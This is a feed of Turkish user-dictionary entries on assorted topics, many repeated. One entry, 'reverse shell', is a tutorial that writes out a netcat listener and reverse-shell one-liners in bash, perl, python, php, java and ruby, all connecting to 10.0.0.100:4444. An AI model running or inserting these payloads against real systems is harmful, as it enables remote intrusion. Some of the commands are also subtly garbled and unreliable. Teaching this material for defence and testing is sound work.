özcan deniz'in devamlı aşk dizisi ve filmi çekmesi
geleneksel bir ailenin ağası, paşasıdır.
devamını gör...
youtube reklamları
android için youtube vanced geri kalan herşey için master card :-)
devamını gör...
az tanım girmesine rağmen karma puanı yüksek olan yazarlar veri tabanı
meselenin sadece tanim olmadiginin farkina varmis, etkilese etkilese seviye atlamis yazarlardir.
begeni ve favorileme tuslarindan harac kesmiyoruz; gonlunuzce kullanabilir ve bu sayede belki sirinleri bile gorebilirsiniz*.
begeni ve favorileme tuslarindan harac kesmiyoruz; gonlunuzce kullanabilir ve bu sayede belki sirinleri bile gorebilirsiniz*.
devamını gör...
02125526507
istanbul avrupa yakasına ait bir telefon numarası. su arıtma cihazı reklamı için arıyorlar. böyle çağrıları sevmiyorsanız peşinen kara listeye ekleyin. *
devamını gör...
ağladıktan sonra yüze gelen güzellik
yüzünün gerilmesi ve beyazlaması durumudur, arada iyi bir tesir bırakır bende.
devamını gör...
mutluluk paradoksu
2011 yılında emotion'da yayımlanan bir araştırmada, mutluluğu fazlasıyla önemseyen kişilerle, mutluluğu fazla önemsemeyen kişiler karşılaştırılmış ve oldukça ilginç sonuçlar elde edilmiştir. öncelikle mutluluğu önemseyen gruptaki katılımcılar, düşük seviyede stres yaratan durumlar karşısında kendilerini diğer gruba kıyasla daha mutsuz hissetmişlerdir. işin daha da ilginci, araştırmacılar, bu katılımcıların mutluluk seviyesini artırmak için onları pozitif uyaranlara maruz bıraktığında da diğer gruba kıyasla daha az olumlu tepki verdiklerini gözlemlemiştir.
mutluluğa daha fazla önem veren kişiler erişilebilir, küçük mutluluklardan daha az mutlu olurken aynı zamanda gündelik hayatta karşılarına çıkan sorunlar yüzünden de daha çok ve çabuk mutsuz oluyorlar. araştırmacılar bu sonuçları mutluluğu fazla önemseyen insanların, erişemeyecekleri mutluluk standartları belirlemiş olmalarına bağlıyor.
aynı ekibin bu sefer 2012 yılında yine emotion’da yayımlanan bir başka araştırmasında ise katılımcıların, bilimsel bir manipülasyon sayesinde, mutluluğa normalde verdiklerinden daha fazla önem vermeleri sağlanıyor. normal şartlarda katılımcıların kendilerini daha iyi hissetmeleri beklenirken aksine katılımcılar, kendilerini sosyal anlamda etraflarından kopuk ve yalnız hissetmeye başlıyorlar. üstelik bu durum sadece katılımcıların öznel hisleri ile sınırlı kalmıyor, hormon seviyelerinde de kendini gösteriyor.
bu sonuçlara dayanan araştırmacılar mutluluk gibi kişisel kazanımlara düşkünlüğün diğer insanlarla olan bağlantımızı zayıflatarak, kendimizi daha yalnız hissetmemize sebep olabileceğini ileri sürmektedirler.
konu hakkında daha fazla bilgi sahibi olmak için tık.
mutluluğa daha fazla önem veren kişiler erişilebilir, küçük mutluluklardan daha az mutlu olurken aynı zamanda gündelik hayatta karşılarına çıkan sorunlar yüzünden de daha çok ve çabuk mutsuz oluyorlar. araştırmacılar bu sonuçları mutluluğu fazla önemseyen insanların, erişemeyecekleri mutluluk standartları belirlemiş olmalarına bağlıyor.
aynı ekibin bu sefer 2012 yılında yine emotion’da yayımlanan bir başka araştırmasında ise katılımcıların, bilimsel bir manipülasyon sayesinde, mutluluğa normalde verdiklerinden daha fazla önem vermeleri sağlanıyor. normal şartlarda katılımcıların kendilerini daha iyi hissetmeleri beklenirken aksine katılımcılar, kendilerini sosyal anlamda etraflarından kopuk ve yalnız hissetmeye başlıyorlar. üstelik bu durum sadece katılımcıların öznel hisleri ile sınırlı kalmıyor, hormon seviyelerinde de kendini gösteriyor.
bu sonuçlara dayanan araştırmacılar mutluluk gibi kişisel kazanımlara düşkünlüğün diğer insanlarla olan bağlantımızı zayıflatarak, kendimizi daha yalnız hissetmemize sebep olabileceğini ileri sürmektedirler.
konu hakkında daha fazla bilgi sahibi olmak için tık.
devamını gör...
kadın cinayetlerinde yanlış tercih gerçeği
yahu senelerdir bu ülkenin televizyonlarında tecavüz ve maço erkek güzellemeleri yapıldı. bu ülkede kızlar annelerinin babalarından şiddet gördüğünü görerek büyüdü. seven erkek kıskanır dendi. o kızın bilinçaltı bunlarla yoğuruldu.
ne bekliyordunuz paşam bunları yaşayan kadınlar tabii ki yanlış erkeği seçer. kimse kimseyi kandırmasın bu ülkenin çoğunluğunun mensubu olduğu din kadın dövmeyi teşvik etti ayet olmasa bile islam dünyasına göre kadın aşağıdır görüşü yaygındır. (bana o ayet öyle değil o hadisler uydurma demeyin) anadolunun bir kasabasından bunları görerek yetişmiş bir kıza yanlış erkek seçimini anlatamazasınız.
hem o bazı erkekler belli etmezler kendilerini çok iyi rol yaparlar. türkiye'de baba figürü çoğu kızda eksiktir. sahiplenen erkek sevmek de bu aslında. önce iyi bir eş sonra iyi bir baba olun ondan sonra yanlış erkek tercihini konuşursunuz.
ne bekliyordunuz paşam bunları yaşayan kadınlar tabii ki yanlış erkeği seçer. kimse kimseyi kandırmasın bu ülkenin çoğunluğunun mensubu olduğu din kadın dövmeyi teşvik etti ayet olmasa bile islam dünyasına göre kadın aşağıdır görüşü yaygındır. (bana o ayet öyle değil o hadisler uydurma demeyin) anadolunun bir kasabasından bunları görerek yetişmiş bir kıza yanlış erkek seçimini anlatamazasınız.
hem o bazı erkekler belli etmezler kendilerini çok iyi rol yaparlar. türkiye'de baba figürü çoğu kızda eksiktir. sahiplenen erkek sevmek de bu aslında. önce iyi bir eş sonra iyi bir baba olun ondan sonra yanlış erkek tercihini konuşursunuz.
devamını gör...
normal sözlük yazarlarının karalama defteri
ellerime tutuşturulmuş yapay bir gülden, parmak ucumda bir diken büyüyor.
çocuk oluyorum günün çekildiği.
bitkisel beklemeler kuşağındayız.
şiddetim dilsiz, kara levha.
suçlu bulundu yeni olmayan neslim.
üçle dördü çarparken sınıfta kalan neslim...
çocuk oluyorum günün çekildiği.
bitkisel beklemeler kuşağındayız.
şiddetim dilsiz, kara levha.
suçlu bulundu yeni olmayan neslim.
üçle dördü çarparken sınıfta kalan neslim...
devamını gör...
zaman yolculuğu mümkün olsaydı gitmek istenilen zaman dilimi
5 yıl sonra ki hayatımı çok merak ediyorum 5 sene sonrasına giderdim
devamını gör...
normal sözlük yazarlarının karalama defteri
buraya sayfalarca yazmak isteyip hiçbir şey yazamayan sadece ben değilimdir inşallah.
devamını gör...
yeni açılacak pastaneye isim önerileri
marie antoinette.
"ekmek bulamıyorlarsa pasta yesinler" sözünün sahibi.
ek olarak: pasta la vista
"ekmek bulamıyorlarsa pasta yesinler" sözünün sahibi.
ek olarak: pasta la vista
devamını gör...
cesaretim olsa yaparım denen şeyler
bungee jumping
devamını gör...
kimseyi engellemeyen yazar
ben engelliyorum, herkesi okuyamam. *
devamını gör...
reverse shell
reverse shell nedir?
ters kabuk olarak türkçeleştirebildiğimiz ana bilgisayar üzerinden değil uzak bi bilgisayar üzerinden remote code execution zafiyetinden yararlanarak hedef makinede etkileşimli bir shell elde etmek ve saldırıyı derinleştirebilip root yetkisi kazanabbilmek için yapılan bir saldırı çeşididir. bugün ters kabukların pratik olarak nasıl çalıştığını açıklayacağız.
reverse shell nasıl çalışır?
ağ üzerinde bulunan bir hedefe bağlanabilmek için saldırgan makineye bir bağlanma isteği yollar ve bir oturum ister. ters kabuklar genellikle bir nat arkasındaki ana bilgisayara uzaktan erişim sağlamanın tek yoludur. bu sebeple meşrü kullanımları da vardır. fakat, siber güvenlikçiler ve hackerlar tarafından bir güvenlik sistemleri tarafından gelen bağlantılardan korunan ana bilgisayarda işletim sistemi kodlarını yürütmek için de kullanılabilirler. örneğin bir e-ticaret sitesine yüklenen zararlı kod kötü amaçlı bir web sitesi bir komut sunucusuna giden bir bağlantı başlatabilir ve saldırgana bu sayede app üzerinde bir reverse shell çalıştırabilir. güvenlik duvarları çoğu zaman bu trafiği filtreler ve bu nedenle listening server'a giden bir bağlantı genellikle başarılı olur.
reverse shell kod örnekleri
saldırgan ilk olarak reverse shell sayesinde aldığı bağlantiları dinlemek için kendi ana bilgisayarında bir dinleyici başlatması gerekir. vereceğim öğrenklerdeki dinleyicilerin ıp adreslerini 10.0.0.100 olarak bağlanamk istediğimiz port ise 4444 olsun. eğer bir linux kullanıcısıysanız bir netcat dinleyicisi başlatmak çocuk oyuncağıdır.
"nc -nvlp 4444"
bu 4444 numaral port'ta bir netcat dinleyicisi başlatır. saldırganın şimdi yapması gereken şey bu makineye uzaktan bağlanabilmek için hedef makinede saldırı kodunu yürütmeesi gerekir. çeşitli sistemler ve diller için birçok hazır reverse shell kodu mevcuttur.
link
pentestmokey bizim için yazıp bırakmış fakat nasıl çalıştığını görebilmek için birkaç tane basit reverse shell kodu yazalım
bash reverse shell
hedef linux bir makinada çalışıyorsa neredeyse tüm linux makinelerde bash bulunduğundan dolayı
bash ile başlamak akıllıca bir seçenektir.
/bin/bash -i > & /dev/tcp/10.0.0.100/4444 0>%1
perl reverse shell
bash gibi perl'de linux makinelerde default olarak gelen bir dildir. bunun içinde bir reverse
shell yazalım.
perl -e "use socket:#i="10.0.0.100";$p=4444;socket(s,pf_ınet,sock_stream,getprotobyname("tcp"));if(connect(s,sockaddr_in($p,inet_aton($i)))){open(stdın,">&s");open(stdout,">&s");open(stderr,">&s");exec("/bin/sh -i");};'
python reverse shell
evet geldik yine pythona son zamanlarda kazandığı popülarite ve yine linux makinelerde
defualt olarak geldiğinden python ile de bir reverse shell yazalım.
python -c 'import socket,subprocess,os;s=socket.socket(socket.af_ınet,socket.sock_stream);s.connect(("10.0.0.100",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
php reverse shell
hala daha pek çok web server php üzerinden çalıştığından dolayı pek çok eğitim sitesinde
ctf'lerde en çok gördüğünüz kabuktur. (&3 eğer çalışmıyorsa yanında yazılan diğer değerleri
deneyin.
php -r '$sock=fsockopen("10.0.0.100",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
java reverse shell
javayı hiç sevmem zerre haz etmem kendisinden fakat bu application serverlarda kullanıldığı gerçeğini değiştirmiyor. (java severler ve oop'yi koruyalım kolluyalım ve ona adaklar adayalım
derneği lütfen az linçleyin). bak bunun için gittim biraz java öğrendim geldim.
run = runtime.getruntime()
port = r.exec(["/bin/bash", "-c", "exec 5<>/dev/tcp/10.0.0.100/4444; cat <&5 | while read line; do \$line 2>&5 >&5; done] as string[])
port.waitfor()
???? ??????? ?????
yaklaşık 5 senedir her ay öğreneceğim diyip öğrenmediğim kod okuya okuya aşina olduğum bir dildir kendileri. sunucu içinde ruby interpreter'ının bulunmasının muhtemel olduğundan dolayı son olarak bunu da son örneğimiz olarak ekleyelim
ruby -rsocket -e'f=tcpsocket.open("10.0.0.100",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
örneklerimiz tükendi ben bildiklerimi tekrar etmiş oldum ve yine güzel bir kaynak ürettik gibi geliyor. gelecekteki konulara kadar sağlıcakla kalın efendim guardian kaçar.
ters kabuk olarak türkçeleştirebildiğimiz ana bilgisayar üzerinden değil uzak bi bilgisayar üzerinden remote code execution zafiyetinden yararlanarak hedef makinede etkileşimli bir shell elde etmek ve saldırıyı derinleştirebilip root yetkisi kazanabbilmek için yapılan bir saldırı çeşididir. bugün ters kabukların pratik olarak nasıl çalıştığını açıklayacağız.
reverse shell nasıl çalışır?
ağ üzerinde bulunan bir hedefe bağlanabilmek için saldırgan makineye bir bağlanma isteği yollar ve bir oturum ister. ters kabuklar genellikle bir nat arkasındaki ana bilgisayara uzaktan erişim sağlamanın tek yoludur. bu sebeple meşrü kullanımları da vardır. fakat, siber güvenlikçiler ve hackerlar tarafından bir güvenlik sistemleri tarafından gelen bağlantılardan korunan ana bilgisayarda işletim sistemi kodlarını yürütmek için de kullanılabilirler. örneğin bir e-ticaret sitesine yüklenen zararlı kod kötü amaçlı bir web sitesi bir komut sunucusuna giden bir bağlantı başlatabilir ve saldırgana bu sayede app üzerinde bir reverse shell çalıştırabilir. güvenlik duvarları çoğu zaman bu trafiği filtreler ve bu nedenle listening server'a giden bir bağlantı genellikle başarılı olur.
reverse shell kod örnekleri
saldırgan ilk olarak reverse shell sayesinde aldığı bağlantiları dinlemek için kendi ana bilgisayarında bir dinleyici başlatması gerekir. vereceğim öğrenklerdeki dinleyicilerin ıp adreslerini 10.0.0.100 olarak bağlanamk istediğimiz port ise 4444 olsun. eğer bir linux kullanıcısıysanız bir netcat dinleyicisi başlatmak çocuk oyuncağıdır.
"nc -nvlp 4444"
bu 4444 numaral port'ta bir netcat dinleyicisi başlatır. saldırganın şimdi yapması gereken şey bu makineye uzaktan bağlanabilmek için hedef makinede saldırı kodunu yürütmeesi gerekir. çeşitli sistemler ve diller için birçok hazır reverse shell kodu mevcuttur.
link
pentestmokey bizim için yazıp bırakmış fakat nasıl çalıştığını görebilmek için birkaç tane basit reverse shell kodu yazalım
bash reverse shell
hedef linux bir makinada çalışıyorsa neredeyse tüm linux makinelerde bash bulunduğundan dolayı
bash ile başlamak akıllıca bir seçenektir.
/bin/bash -i > & /dev/tcp/10.0.0.100/4444 0>%1
perl reverse shell
bash gibi perl'de linux makinelerde default olarak gelen bir dildir. bunun içinde bir reverse
shell yazalım.
perl -e "use socket:#i="10.0.0.100";$p=4444;socket(s,pf_ınet,sock_stream,getprotobyname("tcp"));if(connect(s,sockaddr_in($p,inet_aton($i)))){open(stdın,">&s");open(stdout,">&s");open(stderr,">&s");exec("/bin/sh -i");};'
python reverse shell
evet geldik yine pythona son zamanlarda kazandığı popülarite ve yine linux makinelerde
defualt olarak geldiğinden python ile de bir reverse shell yazalım.
python -c 'import socket,subprocess,os;s=socket.socket(socket.af_ınet,socket.sock_stream);s.connect(("10.0.0.100",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
php reverse shell
hala daha pek çok web server php üzerinden çalıştığından dolayı pek çok eğitim sitesinde
ctf'lerde en çok gördüğünüz kabuktur. (&3 eğer çalışmıyorsa yanında yazılan diğer değerleri
deneyin.
php -r '$sock=fsockopen("10.0.0.100",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
java reverse shell
javayı hiç sevmem zerre haz etmem kendisinden fakat bu application serverlarda kullanıldığı gerçeğini değiştirmiyor. (java severler ve oop'yi koruyalım kolluyalım ve ona adaklar adayalım
derneği lütfen az linçleyin). bak bunun için gittim biraz java öğrendim geldim.
run = runtime.getruntime()
port = r.exec(["/bin/bash", "-c", "exec 5<>/dev/tcp/10.0.0.100/4444; cat <&5 | while read line; do \$line 2>&5 >&5; done] as string[])
port.waitfor()
???? ??????? ?????
yaklaşık 5 senedir her ay öğreneceğim diyip öğrenmediğim kod okuya okuya aşina olduğum bir dildir kendileri. sunucu içinde ruby interpreter'ının bulunmasının muhtemel olduğundan dolayı son olarak bunu da son örneğimiz olarak ekleyelim
ruby -rsocket -e'f=tcpsocket.open("10.0.0.100",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
örneklerimiz tükendi ben bildiklerimi tekrar etmiş oldum ve yine güzel bir kaynak ürettik gibi geliyor. gelecekteki konulara kadar sağlıcakla kalın efendim guardian kaçar.
devamını gör...
güne bir söz bırak
"pencereleri açmak boşunaydı. sevdiğinin olmadığı yerde hava yoktu, boğulabilirdi insan." selim ileri.
"yaşamak için ölmesi gerekiyordu, bilmiyordu. "
"yaşamak için ölmesi gerekiyordu, bilmiyordu. "
devamını gör...
insanlığa güncelleme gelse ilk istenecek özellik
tum insanlara saygı,merhamet,vicdan,durustluk gelse yeter. cok tatli yasanir. herkes sadece kendisiyle ilgilenir .
devamını gör...
madalyalı tanım
hiç işim yok, madalya almak için modlara tanım göndereceğim. üstteki yazar isterse, bana verilen 1 madalyayı da ona verebilirim. noluyor madalya alınca ya? *
devamını gör...
ne farkeder
yüzyüzeyken konuşuruz grubunun 2017 yılında yayınlanan şarkısıdır. aylarca dinlemeyip, bir gün salaş bir barda tesadüfen dinlesem dahi eski bir dost gibi yüzüme hemen tebessüm yerleştirir. hele şu kısım yok mu şahsıma münhasır biyografimdir:
yoktu hiçbir beklentim
zaten olsaydı bile
ne farkeder...
yoktu hiçbir beklentim
zaten olsaydı bile
ne farkeder...
devamını gör...
sonbahar
yönetmenliğini özcan alper'in yaptığı 2008 yapımı bir türk filmi. filmde olaylar hopa, çamlıhemşin, fırtına deresi taraflarında geçmektedir. başrolümüz yusuf (onur saylak), 22 yaşında bir üniversite öğrencisiyken cezaevine giriyor ve 10-12 yıl sonra özgürlüğüne (???) kavuşarak memleketine geri dönüyor, ama sağlık sorunlarıyla. hayatının son iki ayını eski anıları ve yaşanmışlıkları ve kendi içinde olan hesaplaşmasıyla sakin bir şekilde geçiriyor. durumundan da kimseyi haberdar etmemiştir.
film biraz yavaş/sıkıcı ilerliyor da olsa, son zamanlarını geçiren birinin hayatını izliyor olmanın düşüncesiyle de zaman ayırıp izlenebilir diye düşünüyorum.
bir de apolas lermi'nin bir şarkısı var klibinde bu filme ait görüntüler bulunuyor. aklıma gelmişken onu da buradan paylaşayım
film biraz yavaş/sıkıcı ilerliyor da olsa, son zamanlarını geçiren birinin hayatını izliyor olmanın düşüncesiyle de zaman ayırıp izlenebilir diye düşünüyorum.
bir de apolas lermi'nin bir şarkısı var klibinde bu filme ait görüntüler bulunuyor. aklıma gelmişken onu da buradan paylaşayım
devamını gör...
